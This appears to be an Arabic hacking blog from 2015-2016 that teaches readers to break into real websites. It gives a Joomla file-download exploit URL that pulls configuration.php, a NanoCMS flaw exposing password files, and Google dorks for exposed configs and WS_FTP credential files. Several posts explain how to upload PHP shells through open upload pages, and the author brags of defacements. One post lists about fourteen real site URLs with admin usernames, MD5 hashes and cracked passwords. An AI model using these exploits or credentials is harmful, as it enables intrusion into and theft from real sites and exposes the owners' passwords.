Showing posts with label ثغراتي HkRkoz Discoverer. Show all posts
Showing posts with label ثغراتي HkRkoz Discoverer. Show all posts

Thursday, 25 August 2016

يقولون انه برنامج واذا جاك قم بحذفه HPReyos معي هكركوز الكويت

البرنامج ضرني ما نفعني ولكم ما يقوله هذا البرابط وانتم براحتكم
 http://hpreyos.updatestar.com/
 HPReyos هو برنامج برامج في فئة متنوعة وضعتها HPReyos.
 تم التحقق من ذلك للحصول على التحديثات 440 مرات من قبل المستخدمين لدينا تطبيق العميل UpdateStar خلال الشهر الماضي.
 أحدث نسخة من HPReyos غير معروف حاليا. تم إضافته في البداية إلى قاعدة البيانات الخاصة بنا في 2016/07/29.
 HPReyos يتطلب أي نظام التشغيل ويندوز ليتم تشغيلها على جهاز الكمبيوتر سيتم تثبيته على.
 لم يتم تقييم HPReyos من قبل مستخدمينا حتى الان.
 HPReyos is a Shareware software in the category Miscellaneous developed by HPReyos.
 It was checked for updates 440 times by the users of our client application UpdateStar during the last month.
 The latest version of HPReyos is currently unknown. It was initially added to our database on 07/29/2016.
 HPReyos requires any Windows operating system to be running on the computer it will be installed on.
 HPReyos has not been rated by our users yet.
 وطريقه حذفه نفس الصوره او تروح الماي كمبيوتر وتغير اللى بالاحمر باسم حاسوبك
 C:\Users\kw-ok\AppData\Roaming\HPReyos\uninstaller.exe
 انت تضع الرابط لدخول على مكان تواجده
 C:\Users\kw-ok\AppData\Roaming\HPReyos
 وتحذفه
 
 وسلامتكم

اذا عندك اي بي موقع وتحب اخراج الرابط الرسمي والتعرف على السكربتات التى مركبها لاختراقه معي هكركوز الكويت

اذا قمت بالاختراق لصفحه في الانترنت ووجده الايبي بالمتصفح وتحب تعرف المواقع الرسمي تابع
نطبق على هذا الموقع بالايبي = 81.71.56.60
وكشفنا الرابط الرسمي = s5147383c.adsl.online.nl
* الحين عندنا موقع مميز في كشف الاي بي للموقع وليس للجهاز كما تدخل الصفحه بالمقدمه
حنا نروح نضع الاي بي في خانه البحث اللى على اليمين
- IP Details for
ipindetail  هذا موقع اخر ومميز ولكن شرحنا بالتحتي تابع
whatismyipaddress.com/ip/81.71.56.60
IP: 81.71.56.60
Decimal: 1363621948
Hostname: s5147383c.adsl.online.nl
ASN: 5390
ISP: Euronet Communications B.V.
Organization: Euronet Communications B.V.
Services: None detected
Type: Broadband
Assignment: Static IP
Blacklist: Blacklist Check
Geolocation Information
Continent: Europe
Country: Netherlands nl flag
State/Region: South Holland
City: Dordrecht
Latitude: 51.8139 (51° 48? 50.04? N)
Longitude: 4.6687 (4° 40? 7.32? E)
Postal Code: 3311
وهذا موقع رهيب بسكربت عالمي وبرمجه محترفـــــــــــــــــــــــــــــــــــــــــــــــــه
REVERSE IP - MD5 Generator - CloudFlare Resolver - Dns Records
spyhackerz.com
ووجده سر موقع الاخ بالتالي وتمتع معي هكركوز الكويت
wb0.ru
myip.ms
pagesinventory.com/ip/192.232.249.184.html
تقوم بالبحث عن روابط اخره بهذا الامر servis php x=reverseip
بس يكفيكم ما نقلته لكم
----------------
والتطبيق المضمون باستخراج الموقع الرسمي بإأمر ?phpinfo=1
للمحترفين فقط Environment
----------------
وعندك موقع BinG
www.bing.com
تضع اللايبي لموقع كتالي
ip:
وتضغط البحث عن ما في الموقع من مواقع او روابط بنفس الموقع لسكربتات كمثال
http://s5147383c.adsl.online.nl/ msd1.24.4/
حالينا لن اشرح التطبيق بعد الرد سوف اقوم بالشرح
وهذا موقع تشفير عالمي
https://hashkiller.co.uk/md5-decrypter.aspx
الموضوع لم يكتمل تابع بمنتدى الجميع

شرح ثغره جوملا للدخول لقواعد البيانات Joomla بكل سهوله


يمكنك الاختراق بعده طرق كما في الشرح او اخذ البيانات وتقوم بالتجربه في برنامج الاف تي بي 
 Title: Joomla Local File Download Vulnerability
 Dork: inurl:option=com_cckjseblod 
 Exploit: /index.php?option=com_cckjseblod&task=download&file=configuration.php 
 ويمكنك في هذي الثغره القيمه سرقه الايميل وتغيره واشياء واجد

Saturday, 13 August 2016

شرح الثغره ويوجد امثله للاختراق powered by NanoCMS ومن المصدر لتنزيل السكربت

powered by NanoCMS
NanoCMS v0.4
index of /NanoCMS

تطبيق هكركوز الكويت :)

3 Admin Login
عرض المصدر لصفحه NanoCMS Admin Login
4

5 تمسح المأشر عليه وتضع الامر هذا

pagesdata.txt
6 يتم استخراج المطلوب

http://www.crash.com.ar/nano/data/pagesdata.txt
7 تم الدخول للموقع بسلام

admin
c44a793167570071542c72b958dbeaf1
holapepe
موقع التشفير Dm5
وهذا رابط الموقع لتعرف على مسمي اليوزر نيم لصاحب الموقع بالاحمر
Parse error: syntax error, unexpected '?' in /home/crash/public_html/nano/data/index.php on line 1

==============
http://www.if.pw.edu.pl/~zak1www/data/nanoadmin.php
450dc350ba05af1fa932739c7f074075
zak1www123456
==============
http://www.uurr.org/index.php?page=hkrkozalkuwait
uurr
4d4098d64e163d2726959455d046fd7c
hacked
==============
http://www.dalecomp.com/index.php?page=hkrkozalkuwait
dalecomp
9fb9be076da484e517d4d37e6ee7922f
clon98xt
==============
http://havocdynamics.xtreemhost.com/templates/livepreviews/3queens/nanocms/index.php?page=hkrkozalkuwait
fe01ce2a7fbac8fafaed7c982a04e229
demo
==============
http://quitdit.free.fr/index.php?page=hkrkozalkuwait
aceadmin
1d41c853af58d3a7ae54990ce29417d8
ubuntu
==============
http://ferienbahnhof.de/index.php?page=hkrkozalkuwait
merlin
ae6114a9f7c793dafa891baa6bf8af02
b1h3f5
==============
http://server.sdh.lt/info/data/nanoadmin.php
02a0f3bfc985f1792302fa8425adeec2
kaktusas
==============
http://ice09.dimi.uniud.it/index.php?page=hkrkozalkuwait
davide
270aa472fb90a9b6232d3bac161eae87
menene17
==============
http://www.heikkirautio.com/index.php?page=autot-myynniss
kake
b1c97927a772f560f82b57de1a18bf71
jupe12
==============
http://gerinimarmi.it/
21232f297a57a5a743894a0e4a801fc3
admin
==============
http://www.dimingo.com/
ee8da87672a71734b66a9826f2cd8b6c
passwordnanocms
==============
http://www.plotcut.ch/
kritzler
2175cbd188b9680d3cb5de03749c45ae
atariben1627
==============
http://www.gruppoteatrocarmagnola.com/
logiaditlu100volte
d854bbfe2e52b39694de5b5f304967a1
10volteabastu
==============
  

سكربت بورصه اون لاين oscommerce من المصدر معي التعريب والمثال

وصفه برمجه السكربت *

اون لاين مباشر في رفع المنتجات لتسويق او للافلام كمثال
المصدر
https://www.oscommerce.com/
التنزيل لنسخه الاخيره
https://www.oscommerce.com/Products&Download=oscom234
تنزيل التعريب
http://addons.oscommerce.com/category/Languages
تنزيل النسخ القديمه
https://www.oscommerce.com/Products
المثال لبرمجـه
https://demo.oscommerce.com/
Copyright © 2016 osCommerce Demo
Powered by osCommerce
======= ثغره قديمه =======
تم الاختراق لسكربت oscommerce بواسطه السفراني لـ cjonesdesign.co.uk
سلام للجميع وكل امه محمد صلى الله عليه وسلم
كيف تخترق هذا السكربت osCommerce هنا تعال
سكربت دخوله سهل وغير ما تحب
وارجوا على الغرب :
نوع السكربت osCommerce
ثغره منوعه بخلطتي السريه
اولا موقع السكربت هنا
http://www.oscommerce.com/
صوره لتوضيح
http://www.oscommerce.com/images/oscommerce.gif
وصفه السكربت لشنو
http://www.swalif.net/softs/swalif54/softs146790/
تعال هنا بندا بالاختراق مع اللعب ورفع صوره او شل بصيغه صوره لم اجرب
Title Value Action
Store Name Testos
Store Owner testos stores
E-Mail Address colin@cjonesdesign.co.uk
E-Mail From Colin Jones
حلا عليك
البحث بعده طرق ! بمثال
Powered by osCommerce
او كتالي
oscommerce/admin/index.php للوحه التحكم مهمه
Index of /osCommerce
اختر هذا وينتهي كل شئ
Hilfsprogramme
وهذا اختراق انتهي
http://cjonesdesign.co.uk/oscommerce/
وتابع الصور بالمرفق تشرح
المهم عند الوصول لهذى تغدر بسرقه صاحب الموقع من ايميل واسم واختراق شامل
1 - oscommerce/admin/configuration.php

Friday, 5 August 2016

تم اختراق هذا الموقع المدعي انه موقع فحص بعام 2010 لرئيه فقط شاهد geillepuffy.com

تم اختراق الموقع بعد ما تأذيت منه من الدخول له بارسال ملفات تجسس ولخبطه الحاسوب عندي نشاهد البرنامج اللى يطلع
والاختراق تم بحمدلله وسحب السيفون عليه بكل ما يملكه والمواقع الاخره
12 موقع

2008 طريقه جديده بالتعرف على المواقع المضافه باي موقع مع الهاش antiviru.ini


استخدمه هذا بالتجربـه
 rdir0="/ وقمت بتغير الصفر لعده ارقام ووجده دخلات حلوه
 بمثال نستخدم اي بحث نجرب بقوقل ونشوف النواتج
 نركز على الروابط التى تحمل باخرها كتالي
 ini
 عند وجود الرابط اضغط عليها وراح يكون الناتج ملف تحميل اعمل لها اوبن لفتح
 شاااااااااااااااهد الصوره
 
 شاهد الناتج لفتح
 
 بالمرفق التفصيييل
 من الطريقه هذى تستفيد دخول عشوائي على المواقع التى تستخدم برنامج WS_FTP.Pro وغيرها 
 بس الحمير حمير بوضع الاسم والرقم السري بهذا البرنامج !!
 - التيكست بداخله < معلومات مفيده ودواهي بداخله شوفها وادعلي بالخير
 وهذا المسار لـ
 rdir0="/ يجي بالترتيب حسب ما رفعته بالموقع مع التوضيح تعرفها بعدين
 والحلاوه انك تعرف كل ما في الموقع من مواقع مضافه مع تفصيل الفرعيات لها حسب تخطيط الموقع
 وتم الطبيق على هذا الموقع كتجربه
 http://images.tvnz.co.nz/tvnz_images/Nzoom.ini
 ولتلاعب اكثر تقوم بمسح خانه خانه لين توصل لغرضك كمثال الخانه لمسح
 http://images.tvnz.co.nz/tvnz_images/
 طريقه الاختراق لموقع وغيره بالبحث عن مركز تحميل او شيل مرفوع بشغله او تجسس والى اخر
 بس الموضوع هذا هو اختراق لو تقولي بعد هكر ههههههههههه
 من طرقي السريه لعيونكم تم
 وطرق البحث عن المشروح بالدخول العشوائي والخطير
 antiviru.ini هذا يجيب لك بس يخص موقع حمايه مشهور 
 WS_FTP.ini
 WS_FTP.LOG
 توضيح الطريقه لـ ini 
 ليس شرط وجودها في الرئيسية يمكن تكون باحد السكربتات او الملفات الاخره وانت وتخطيطك في الاختراق
 تاريخ النشر : 13-4-2008
 والقادم عنيف

Tuesday, 19 January 2016

برنامج shadow security scanner من المصدر لفحص اي موقع بثغره safety-lab

سلامة مختبر الظل الأمن الماسح الضوئي هو الماسح تقييم الضعف الاستباقية الكمبيوتر أمن الشبكات مع أكثر من 5000 مراجعة الحسابات.
هذا هو جيل جديد من برامج التكنولوجيا الفائقة (شبكة الماسح الضوئي تقييم أوجه الضعف) أن الأمن perforShadow Scannermed إلى حد كبير في القرن 20th ويبقى على خط الجبهة في الألفية الجديدة! وقد حصل الظل الأمن الماسح الضوئي (شبكة الضعف الماسح الضوئي التقييم) اسم من أسرع - وأفضل أداء - الماسح الضوئي الأمني ​​في قطاع في السوق، متفوقة بذلك العديد من الماركات الشهيرة. وقد وضعت الظل الأمن الماسح الضوئي لتوفير الكشف آمن وسريع وموثوق بها من مجموعة واسعة من ثقوب النظام الأمني. بعد الانتهاء من الفحص النظام، الظل الأمن الماسح الضوئي يحلل البيانات التي تم جمعها، ويقع نقاط الضعف والأخطاء الممكنة في خيارات الملقم ضبط، وتقترح السبل الممكنة من حل المشكلة. ظلال الأمن الماسح الضوئي يعمل فريدة من نوعها أمن نظام تحليل خوارزمية تقوم على براءة اختراع "الأساسية الفكري". ظلال الأمن الماسح يؤدي نظام المسح الضوئي في مثل هذه السرعة وبمثل هذه الدقة وذلك لتكون قادرة على المنافسة مع الأجهزة الأمنية لتكنولوجيا المعلومات المهنية والمتسللين، في محاولة لاقتحام الشبكة.

For Vista/Windows7 users.
To install Shadow Security Scanner in Vista/Windows7 disable UAC:
1. Access User Control Panel from Start Menu ->Control Panel ->User Accounts and Family Safety ->User Account.
2. Click on User Account Control settings link.
3. Move the Slider to Never Notify.
4. Click OK to make the change effective.
5. Reboot
لمستخدمي ويندوز فيستا / WINDOWS7.
لتثبيت الظل الأمن سكانر في ويندوز فيستا / WINDOWS7 تعطيل UAC:
  1. الوصول إلى لوحة تحكم المستخدم من قائمة ابدأ -> لوحة التحكم -> حسابات المستخدمين وأمان العائلة -> حساب المستخدم.
  2. اضغط على حساب المستخدم رابط إعدادات التحكم.
  3. حرك المنزلق إلى أبدا الإعلام.
  4. انقر فوق موافق لجعل التغيير الفعال.
  5. إعادة تشغيل
يعمل على منصة ويندوز الأصلية، ظل الأمن الماسح الضوئي أيضا بمسح خوادم بنيت عمليا على أي منصة، وكشف عن مخالفات في يونيكس، لينكس، فري، اكبر برهان، صافي بي إس دي، وسولاريس، وبطبيعة الحال، ويندوز 95/98 / ME / NT / 2000 بنجاح /XP/.NET. بسبب هندسته المعمارية الفريدة، الظل الأمن سكانر هي الماسح الضوئي الأمن الوحيد في العالم قادرة على كشف العيوب مع سيسكو، إتش بي، وغيرها من معدات الشبكات. بل هو أيضا الماسح الضوئي التجاري الوحيد القادر على تتبع أكثر من 4000 عمليات التدقيق في النظام.
حاليا، والخدمات الأساسية التالية المعتمدة هي: بروتوكول نقل الملفات، SSH، Telnet و SMTP، DNS، فنجر، HTTP، POP3، IMAP، تر شيئا، NFS، NNTP، SNMP، الحبار (ظل الأمن الماسح الضوئي هو الماسح الضوئي فقط لمراجعة خوادم بروكسي - أخرى الماسحات الضوئية فقط التحقق من الموانئ التوفر)، LDAP (ظل الأمن الماسح الضوئي هو الماسح الضوئي فقط لتدقيق ملقمات LDAP - الماسحات الضوئية الأخرى تحد من تصرفاتهم للتحقق منافذ)، HTTPS، SSL، / خدمات IP، UDP، والتسجيل TCP. بسبب بنية مفتوحة بالكامل (على اكتف) أي المهنية مع معرفة VC ++، C + + منشئ أو دلفي قد بسهولة توسيع قدرات الماسح الضوئي. تمكن تقنية ActiveX أيضا مسؤولي النظام لدمج الظل الأمن الماسح الضوئي إلى عمليا أي اكتف المنتج دعم
Safety Lab Shadow Security Scanner is a Proactive Computer Network Security Vulnerability Assessment Scanner with over 5000 audits.
This is a new generation of hi-tech software (network vulnerability assessment scanner) that perforShadow Security Scannermed greatly in the 20th century and remains on the front line in the new millennium! Shadow Security Scanner (network vulnerability assessment scanner) has earned the name of the fastest - and best performing - security scanner in its market sector, outperforming many famous brands. Shadow Security Scanner has been developed to provide a secure, prompt and reliable detection of a vast range of security system holes. After completing the system scan, Shadow Security Scanner analyses the data collected, locates vulnerabilities and possible errors in server tuning options, and suggests possible ways of problem solution. Shadow Security Scanner employs a unique system security analysis algorithm based on a patented "intellectual core". Shadow Security Scanner performs the system scan at such a speed and with such a precision so as to be able to compete with the professional IT security services and hackers, attempting to break into your network.
Running on its native Windows platform, Shadow Security Scanner also scans servers built practically on any platform, successfully revealing breaches in Unix, Linux, FreeBSD, OpenBSD, Net BSD, Solaris and, of course, Windows 95/98/ME/NT/2000/XP/.NET. Because of its unique architecture, Shadow Security Scanner is the world's only security scanner able to detect faults with CISCO, HP, and other network equipment. It is also the only commercial scanner capable of tracking more than 4,000 audits per system.
Currently, the following key services supported are: FTP, SSH, Telnet, SMTP, DNS, Finger, HTTP, POP3, IMAP, NetBIOS, NFS, NNTP, SNMP, Squid (Shadow Security Scanner is the only scanner to audit proxy servers - other scanners just verify ports availability), LDAP (Shadow Security Scanner is the only scanner to audit LDAP servers - other scanners limit their actions to ports verification), HTTPS, SSL, TCP/IP, UDP, and Registry services. Because of a fully open (ActiveX-based) architecture any professional with knowledge of VC++, C++ Builder or Delphi may easily expand the capabilities of the Scanner. ActiveX technology also enables the system administrators to integrate Shadow Security Scanner into practically any ActiveX supporting product

Tuesday, 5 January 2016

من المصدر برنامج فاحص المواقع عن الثغرات WebCruiserWVS

من المصدر برنامج فاحص المواقع عن الثغرات WebCruiserWVS
WebCruiser – Web Vulnerability Scanner, a compact but powerful web security scanning tool that will aid you in auditing your site! It has a Vulnerability Scanner and a series of security tools.

It can support scanning website as well as POC (Proof of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also an automatic SQL injection tool, an XPath injection tool, and a Cross Site Scripting tool!
Key Features:
* Crawler(Site Directories And Files);
* Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.;
* SQL Injection Scanner;
* SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept);
* SQL Injection for SQL Server: PlainText/Union/Blind Injection;
* SQL Injection for MySQL: PlainText/Union/Blind Injection;
* SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection;
* SQL Injection for DB2: Union/Blind Injection;
* SQL Injection for Access: Union/Blind Injection;
* Resend Tool;
* Bruter Tool;
* Cookie Tool;
* Cross Site Scripting Scanner and POC;
* XPath Injection Scanner and POC;
* Auto Get Cookie From Web Browser For Authentication;
* Report Output
System Requirement: Windows with .Net Framework 2.0 or higher
المصدر × تنزيلي الشخصي
عندك تسكات يمكنك تطويره بفكرك
- combo
- password
- username
388 KB

وسلامتكم

Wednesday, 7 October 2015

تم وجود البرنامج فاحص ومخترق المواقع XCode Exploit كسكودي

  XCode Exploit كسكودي
SQLi LFI XSS Shell Upload Complete Tutorial
Code name : .::XCode Exploit - Vulnurable & webshell Scanner::.
Description : - SQLI/LFI/XSS/Webshell Hunter with Google Engine -
Date : May 2011
Compiler : Microsoft Visual Basic 6.0
System : Windows 95, 98, XP, Vista, 7
Size : 1403 kb
Update : I`m not sure where will i put it. Just
صاحب الشأن مواقعه ملغيهـ
على كله حال وجود البرنامج على الرابط هذا
وهذا رابط اخر غير موثوق فيه
وعندنا هذا البرنامج يمكن يحل المشكله لم اجربهأ
XCode Exploit Scanner System Tray Cleaner
والبرنامج لم يشتغل ... معي وهذي عده محاولات ولا فايده
ووجود هذا الملف التنفيذي
MSVBVM60.DLL
وهذا شرح فيديو كمثال
انجليزي او عربي حسب نوع جهازك
Visual Basic 6.0 Server حزمة
على ويندز اكس بي شغال حسب ما شاهدتهـ
Msvbvm60 DLL معلومات خطأ
ويصنف خطأ دلل Msvbvm60 كما رهيب. خطأ دلل لأنه يرتبط مع وحدة MSVBVM60.DLL الذي ينتمي إلى Microsoft Visual Basic من الجهاز الظاهري شركة مايكروسوفت. تم تصميم MSVBVM60.DLL حدة لإدارة عملية برامج في Microsoft Visual Basic. وحدة MSVBVM60.DLL ينتمي إلى Microsoft Visual Studio 6.0 حزمة الخدمة ويمكن تركيبها تلقائيا على جهاز الكمبيوتر الخاص بك عند تمكين ل Visual Basic 6 وقت التشغيل على جهاز الكمبيوتر الخاص بك. في مجلد ويندوز NT/2000، وحدة MSVBVM60.DLL يقع على C: المجلد WINNT SYSTEM32 ، ولكن في نظام التشغيل ويندوز إكس بي / فيستا، فإنه يقع على C: المجلد Windows SYSTEM32
ولم ينفع شئ من التطبيق ..
تنويه:
وسوف تستخدم هذه الأداة لا اجعلك تصبح هاكر.
تحميل وتركيب، تشغيل، نسخة، وتبادل هذا البرنامج
يعني أنك وافقت جميع المخاطر ستكون ربما تضر
النظام. أنا لن مسؤولة عن أي عمل والضرر
اتخذت مع هذه الأداة.
كسكودي استغلال - Vulnurable وwebshell الماسح تساعدك على
جمع رابط dorks من Google. فإنك قد تحقق من
النتائج إذا Vulnurable لاستغلال مع أوامر SQL، LFI،
وXSS. وتستطيع اصطياد webshells تلك التي تم تحميلها.

متفرقات:
هذا البرنامج جمعت تحت ل Visual Basic 6.0. إذا ش الحصول على بعض
أخطاء محذرا "... الملف مفقود أو غير صالح"، وهو ما يعني بعض
مكونات VB قد يكون غير مثبت على computer.Just الخاص
تحقق من ملف في عداد المفقودين على www.google.com.
المثال كلمة: تحميل MSVBVM60.DLL
Disclaimer:
Using this tool will not make u become a hacker.
Download, install, running, copy, and share this program
means you agreed of all risk would be possibly harm the
system. I will not responsible for any action and damage
taken with this tool.
XCode Exploit - Vulnurable & webshell Scanner help you to
gather the dorks Link from Google. then you may check the
results if its Vulnurable to exploit with SQL commands, LFI,
and XSS. And You may hunt the webshells those uploaded.
Misc:
This Program compiled under Visual Basic 6.0. If u get some
errors warning "...file is missing or invalid", It means some
of VB components might be not installed on your computer.Just
check the missing file out on www.google.com.
example Keyword : download MSVBVM60.DLL
المصدر لاسم الخدمهـ

Visual Basic فيجوال بيزك دوت نت

Saturday, 12 September 2015

ثغره سكربت phpAuction مع التطبيق لمواقع الاباحه


هذا موقع تم اختراقه لـ -auction.info اختراق تخريب وسطحي المهم



السكربت : لمن حب تجربتهـ phpAuction من مصدره
تطبيق : السكربت
Step One: Create a database
Step Two: Edit config.php with your MySQL information.
Step Three: Edit includes\adminmail.inc.php with your main email.
Step Four: Upload all all files to your server, keeping the directory structure in tact..
Step Five: Set permissions on the following files:
chmod 777: the folder "counter"
chmod 666: /counter/auction_id.txt
chmod 777: the folder "uploaded"
chmod 777: the folder "banners"
chmod 777: /includes/adminmail.inc.php
chmod 777: /includes/categories_select_box.inc.php
chmod 777: /includes/countries.inc.php
chmod 777:/includes/currency.inc.php
chmod 666: log.txt (for debugging purposes in payment system)
Step Six: Create a cron job to ensure that the page cron.php gets executed periodically. This page will close auctions, notify bidders, etc. The following is a cron to run daily at 12:15 am. You can change this once your site has heavier traffic to run more often however to start with once a day is highly recemmended.
Using Cpanel, access cron jobs off the main page. There, click on Advanced (Unix Style), and enter your email address then enter the following information in the box's: (15) in first box, (0) in second, (*) in third, forth and fifth, (GET http://-- --- .com/cron.php > /dev/null) in the text field.
15 0 * * * GET http://y our do main.com/cron.php > /dev/null
Step Seven: Visit http://www.you rw ebs ite.com/install.php. This will run the installer that will create the tables and populate your data, after the installer has completed you will be prompted to create your admin login information. Once complete, browse through the admin sections to edit your website.
It is recommended that you delete install.php from your server after the site is installed
والموقع المخترق مركب السكربت !!!
وهذى اوامر بحث :
intitle:index.of config.php
intitle:"Index of" phpinfo.php
intitle:index.of adminmail.inc.php =
intitle:index.of config.tmp.php
intitle:index.of config.php =Auction
intitle:index.of =Auction

ثغره مركز PHPhotoalbum تعال اخترق

اكثر اصدار
PHPhotoalbum v0.4 by Henning Støverud
البحث عندكـ

- inurl:*PHPhotoalbum/upload* اساسي وغير
- zurück zur Übersicht
- News Admin-Bereich
- Newsseite 1.0
- 
mail@kaimueller.de ايميل المبرمج
وهذا الامر ... تسويها قبل كل شئ 
- admin/testbase.sql
لتكشف بيانات الدخول بدل الرفع
مثال مباشر
http://wuw.stusta.mhn.de/~u002006a/PHPhotoalbum/upload.php
http://textideas.com/seiten/gallerie/PHPhotoalbum/upload.php
اغلبها مخترقهـ
- ادمج الشيل بصوره
موفقين

ثغره في مواقع التايلنديه مركز تحميل مع هكركوز الكويت upload


ระบุ ที่จะ ؟

للمحترف الاختراق ...

البحث عن " ระบุ File ที่จะ Upload "
/// المسار

upload/upload.html

Upload เสร็จแล้ว
file อยู่ที่
2014-11-04-hkrkoz.php
ระบุ File ใหม่ต่อไปได้เลย

هذا مثال وتم الاختراق >>>>>>>>>>>

×_* هذا للأقوياء <<< هنا

Upload ไม่เปลี่ยนหน้า

ثغره fluidgalleries photo-upload

البحث عن الدخول لثغره باحد هذي الاوامر "
 upload screen design
 
Index of /fluidgalleries
 fluidgalleries/php/photo-upload.php
 php/photo-upload.php
 photo/fluidgalleries
 Index of /fluidgalleries/photos

 * المثال على المطلوب من الثغره هذا
المركز *

 Invalid file type! نوع الملف غير صالح!

 لزم يكون كذا <<<
 بلا خطئ يعني تم التحميل
 وشروط التحميل كتالي
 
Uploaded images must be in standard jpeg format. Progressive scan jpeg's are not supported
 يجب أن تكون الصور محملة بتنسيق JPEG القياسي. غير معتمدة التقدمي JPEG المسح الضوئي

 والرابط يكون بهذا المسار
 photo/fluidgalleries/php/photo-upload.php
 راح تجد ما رفعته اذا ماكان مغير المسار
 fluidgalleries/photos/
 
هذا المجلد او الرابط اللى تم الرفع فيه
 photos

 الثغره مركز تحميل صور لسكربت المركب
 ومن عندي لكم كشف هذا الرابط لاخراج الباسبورد
 fluidgalleries/dat/login.dat

برنامح كشف الثغرات الغير مرخص ويوجد نسخه 2006 لتجربه shadow security scanner

من المصدر ...
يمكنك التجربهـ لهذي النسخه
11.5 MB
Windows All




Seresco S.A.
Mississippi State University
LGT Financial Services
U.S. Department of Education
PEC Solutions
Tyco International
Nixon Peabody LLP
Prometheus Group
nGran LLC
National Security Research Institute
AEC
KDDI Network and Solutions
SwissSign AG
Trend Micro
ING Group
Dept. of Veteran Affairs U.S.
Shell Oil
Copeinca Peru
STI Group
Noryanismayus Enterprise
Soyus Bank
Departmento Tecnico del M.D.E.
Department Defense Spain
U.S. Department of Education
IT Department MOPS Vietnam
Grupo Gloria
Hoppecke Batterien Gmbh Co.
Vantage Point Solutions
Canadian Wheat Board
Volunteer State Bank Tenn. U.S.
Lake City Bank
Starhome
PricewaterhouseCoopers S.C.
Celero Solutions CA
Tech Defenders
Department of Administrative Services Iowa U.S.
Shanghai Futures Exchange
Brunei Shell Petroleum Co
Carnet
Sarcos
ECM\Portugal
Tenovis Gmbh
Accenture
U.S.Dept. of H.U.D.
Avaya-Tenovis
Fuji Photo Film BV
SINFIC
Deliotte Accountants B.V.
Chande
Korea Computing
Stadtwerke Dusseldorf AG
Italia Telecom
Forensic Computing Switzerland
Deptment of Veteran Affairs U.S.
Deutsche Telekom
Australia Cancer Society
Lockheed Martin
ADLS Consulting-Madrid
State of NH Office of Information
WestLB AG
Rovex telecom
Telecom Italia Mobile
Ernst and Young
Fisev health Inc.
KPMG
TWM Associates INC.
West LB AG
Alfa Bank

For Vista/Windows7 users.
To install Shadow Security Scanner in Vista/Windows7 disable UAC:
 1. Access User Control Panel from Start Menu ->Control Panel ->User Accounts and Family Safety ->User Account.
 2. Click on User Account Control settings link.
 3. Move the Slider to Never Notify.
 4. Click OK to make the change effective.
 5. Reboot.
لمستخدمي ويندوز فيستا / WINDOWS7.
لتثبيت الظل الأمن سكانر في ويندوز فيستا / WINDOWS7 تعطيل UAC:
  لوحة تحكم العضو 1. الوصول من قائمة ابدأ -> لوحة التحكم -> حسابات المستخدمين وأمان العائلة -> حساب المستخدم.
  2. اضغط على حساب المستخدم الارتباط إعدادات التحكم.
  3. حرك المنزلق ليخطر أبدا.
  4. انقر فوق موافق لجعل التغيير الفعال.
  5. إعادة التشغيل.

البرنامج بين خدمتين - الثغرات والتأمين لك
Keep your Computer Network Systems safe with Safety-Lab low cost Security Scanning and Risk Management programs.
While most regular computer users think that the threat to computers and computer networks come from viruses, spyware and other types of malicious software, security experts agree that the real source of danger are holes and backdoors in the legitimate software already installed, which, if not patched or fixed, may grant unlimited access to hackers and theft. Shadow Security Scanner is a specialized solution that performs 5000+ vulnerability tests to detect system security holes, locate weak spots and errors, and helps fix these problems.
Safety-Lab has gained worldwide acknowledgment as a provider of specialized integrated solutions for Internet and Computer Security. The company has developed a family of security software to cover all possible issues for network maintenance including threat analysis, security audit, software architecture, detection and fixing of vulnerabilities and exposures, patch installation, and reviews of security policies. In this ever developing dynamic environment Safety-Lab provides to our clients 24x7 comprehensive technical support, a specialized daily update Download zone and prompt security upgrades. Protect your most valuable Assets -Your Business and Financial Information. Let Safety-Lab find your security holes before hackers and information thieves do.
As network security professionals we understand the risk your office network and the whole e-business structure are exposed to. That is why at Safety-Lab we offer only the most up-to-date multifunctional and reliable solutions to provide extensive analysis and instant upkeep of your network. Find and repair your security holes before intruders do
ابق على أنظمة شبكة الكمبيوتر آمنة مع السلامة مختبر منخفضة التكلفة الأمن المسح الضوئي وبرامج إدارة المخاطر
في حين أن معظم مستخدمي الكمبيوتر العادية اعتقد ان الخطر على الحواسيب والشبكات الحاسوبية تأتي من الفيروسات وبرامج التجسس وغيرها من أنواع البرمجيات الخبيثة ، وخبراء الأمن يوافق على أن المصدر الحقيقي للخطر هي الثقوب وخلفي في البرامج الشرعية المثبتة مسبقا ، والتي ، إن لم يكن مصححة أو ثابتة ، قد منح الوصول غير المحدود للقراصنة والسرقة. ظل الأمن الماسح الضوئي هو الحل المتخصصة التي تنفذ 5000 + اختبارات للكشف عن هشاشة النظام ثغرات أمنية ، تحديد نقاط الضعف والأخطاء ، وتساعد على إصلاح هذه المشاكل
سلامة مختبر في جميع أنحاء العالم وقد اكتسبت اعترافا كمقدم للحلول المتكاملة المتخصصة للانترنت والكمبيوتر الأمن. فقد طورت الشركة لأسرة مكونة من البرامج الأمنية لتشمل جميع المسائل الممكنة لصيانة الشبكة بما في ذلك تحليل التهديدات ، ومراجعة الحسابات الأمنية ، هندسة البرمجيات ، وكشف وتحديد مواطن الضعف والتعرض ، وتثبيت التصحيح ، واستعراض السياسات الأمنية. في هذا النامية من أي وقت مضى سلامة البيئة الحيوية مختبر يوفر لعملائنا 24x7 شاملة الدعم التقني ، وكالة متخصصة من تحديث يومي منطقة تحميل ورفع مستوى الأمن موجه. حماية الأصول الأكثر قيمة لعملك والمعلومات المالية. اسمحوا السلامة مختبر العثور على ثغرات أمنية من قبل القراصنة واللصوص المعلومات القيام به
كمحترفين أمن الشبكات نفهم من مخاطر شبكة المكتب وكامل الأعمال التجارية الإلكترونية هيكل يتعرضون لها هناك. وهذا هو السبب في سلامة مختبر نحن نقدم فقط وصولا إلى أحدث حلول موثوقة ومتعددة الوظائف لتوفير تحليل واسعة وفورية لصيانة الشبكة الخاصة بك. العثور على وإصلاح الثغرات الأمنية الخاصة بك قبل قيام المتسللين
شرح مختصر :
عند فتح البرنامج ستظهر لك قائمة باليسار اختار منها scanner
وتابع
اختار complete scan
ثم next ثم next
ثم اختار add host
واكتب عنوان الموقع المراد كشف الثغرات فيه
مثلا اكتب هذا الموقع للتجربه وهو معادى للعرب
وتابع
اضغط كليك يمين ثم start scan
يبدا البرنامج في عمل مسح للموقع وكشف للثغرات والبروتوكولات التى يستخدمها
ونابع
